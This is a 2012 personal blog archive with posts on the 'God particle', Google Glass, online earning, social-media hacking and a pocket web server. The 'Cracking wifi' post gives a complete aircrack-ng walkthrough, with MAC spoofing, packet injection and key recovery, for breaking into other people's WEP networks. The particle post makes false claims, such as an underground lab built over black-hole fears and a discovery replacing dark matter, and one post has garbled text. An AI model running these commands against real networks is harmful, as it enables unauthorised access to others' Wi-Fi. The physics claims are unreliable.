Wednesday, July 4, 2012

God particles

God is found in an atom

The research was done at France and Switzerland lab which was totally underground (The lab was made underground since there was a risk of creation of a black hole and whole earth would merge into it). The physical dimension of the lab was 160 meters beneath the surface and 27 kilometres long

The major features of this invention are as follows:

There is a highly dense collision of protons

Around 1600,000,000,000 collisions were done under critical pressure and only 300 God particles were created.

The created particles are considered to be the particles from GOD

These particles are going to disclose the origin of the universe and  how actually the world arose

The invention is going to replace the theory of DARK MATTERS

It is also intended to find out the fact and origin of BLACK HOLE

Friday, June 8, 2012

Cracking Wifi- part 2

We are done with the wifi cracking for WEP type of encryptions. If you are still to use the WEP cracking, refer to the link here in my blog for the tricks and codes for wifi cracking:

Now I m heading for the tools to crack the stronger forms of encryptions like WPA, WPS etc. I will soon let you guys know about the process and tricks to crack the wifi of stronger protections. So Stay connected !!!!!!!!!!!!!!!!!!!!!!!!!

Problems in internet earning

Why is this so much hard to earn money online???? People think that earning money is so easier that they can earn more amount of dollars just by simple processes. I want to share my experience that I have not even got a clue on earning through the blogging. Likewisely through web advertising and promoting I am still wondering how to increase my little money on account. There are so lots of rules that it is hard to be abided. I want you to suggest your practical experience regarding this.

Saturday, June 2, 2012

Preview of Google Glasses

The Google glass is the hot topic in this recent days. Added with whole lots of features of a smart phone and ultramodern electronic devices like cameras, internet connection, mirrors, glasses, speech codecs, microphones  etc. this device is really going to amaze the people.
The high versatility of this device is intended to help the people to fulfil their electronic dream but on the othe hand, this device is not yet to be ranked as a hit or flop. The general users and normal people donot seem to be interested in this device since they are already feeling that the device will be tedious to operate.
This is the high class eyewear, features the web browisng for video chatting as long as there is the web connection. The display is full of the extra features, so it is often suspected that the users will be focussed on the features of the device rather than what is around them. Their line of sight is fully distracted. The lusture of this device also seBut ems to be a problem since it is easily breakable.
Experts has to say that this device can turn as replacement to the music devices like ipods. People will show their interest in this device with many features than to the ipod with limited features. it also maintains privacy and thus enables the user to achieve the full package of modern electronic device. We must say that no matter what the market status will reveal in future, this device is surely going to help in the military field, health sector and other various hazardous and critical areas. Lets hope this will help tha mankind.

Cyber Insecurity

Talking about the cyber insecurity has grown like a basic need in the field of internet concept. Every field of the internet is wooven with various types of threats and risks. Many individuals and group of people have made themselves  active in creating cyber insecurity, in form of viruses, cracked tools, account hacking etc.
 In these recent days, hacking the account of people from the social sites and misusing them has grown as a serious threat to all the users. Social sites like facebook, digg, twitter, etc are in the spotlight. Accounts of the users, especially girls and some famous people like celebrities, political leaders etc are in the main target of the hackers. They hack your account and misuse them for illegal contacts, illegal posts, dangerous deals and so on. Some even misuse the accounts by misusing the pictures and documents. They edit the pictures of girls and sell it for illegal sites. Some even hack the accounts for fun purpose. Evidence has it that in this recent days, a group is active in hacking the random users of facebook. They claim that they were challenged by facebook admin to hack the account. They even claim that they just hack to show it for facebook admin. And they try to ensure the users that they won't be misusing them. But in no ways we can trust the devil minds. Generally such hackers change the password of the account and make it inaccessible for the original users.
So I urge the entire users of such social sites to keep the account password as strong as possible and I also want to tell them not to keep valuable and secret informations or documents in these types of sites. Hope you will stay safe.

Wednesday, May 30, 2012

Cracking wifi

Although this is already a common procedure and that most of the people has already implemented this, those who are still to break the wifi code, you can refer to this article.
Note: This will work only for WEP type of encryption and that you need to run a Live Persistent CD of Backtrack 4.
Here '//' is for comments and you don't need to type texts within this.

Open a shell/konsole then start to type:


// then a interface of your computer is shown, for example we take eth1 //

airmon-ng stop eth1
ifconfig eth1 down
macchanger -- mac 00:11:22:33:44:55 eth1
airmon-ng start eth1
airodump-ng eth1
// here note down the BSSID number and channel number of the network you need to attack, we take BSSID no. as 00:11:95:19:40:9B and channel no. as 6//

airodump-ng -c 6 -w pokemon --bssid 00:11:95:19:40:9B eth1

// donot close this shell. open a 2nd shell and write the following://

aireplay-ng -1 0 -a 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1
aireplay-ng -3 -b 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1

// keep on the data on the 1st shell. The data should reach more than 10000. minimise the 2nd shell and continue writing following on third shell://

aircrack-ng -b 00:11:95:19:40:9B pokemon-01.cap

// The code is finished. Now when the key is cracked, it is obtained on the shell in the format: aa:bb:cc:dd:ee..... Remove the colons and thus obtain the wifi key of the network you attacked.
For the more knowledge about the scope and facts about the backlink through open sources you can refer to the following link:

.........Enjoy The Key............... //

Server in a small package

Web Server in a small box is a user compatible and highly versatile concept with the help of which the user can launch the hundreds of web pages by connection by the Internet through the layer-3 device like modems and routers. This device is a portable device which can be carried to any part of the world and user can easily host the web pages. The interesting fact is that it can also be accessed through the mobile gprs facility.
The concept of this project explains to the user that server doesnot need large and expensive devices to launch the web hostings.
The overview of the features of this device can be summarised as below:
user customisation: explicit setting of port numbers, ip address and so on
memory: external memories like memory card
dynamic web features: FTP server, SMTP client server, HTTP server, DNS server, SNTP server and much more
user customised file formats
analog outputs and digital outputs
internet controllable ports and many more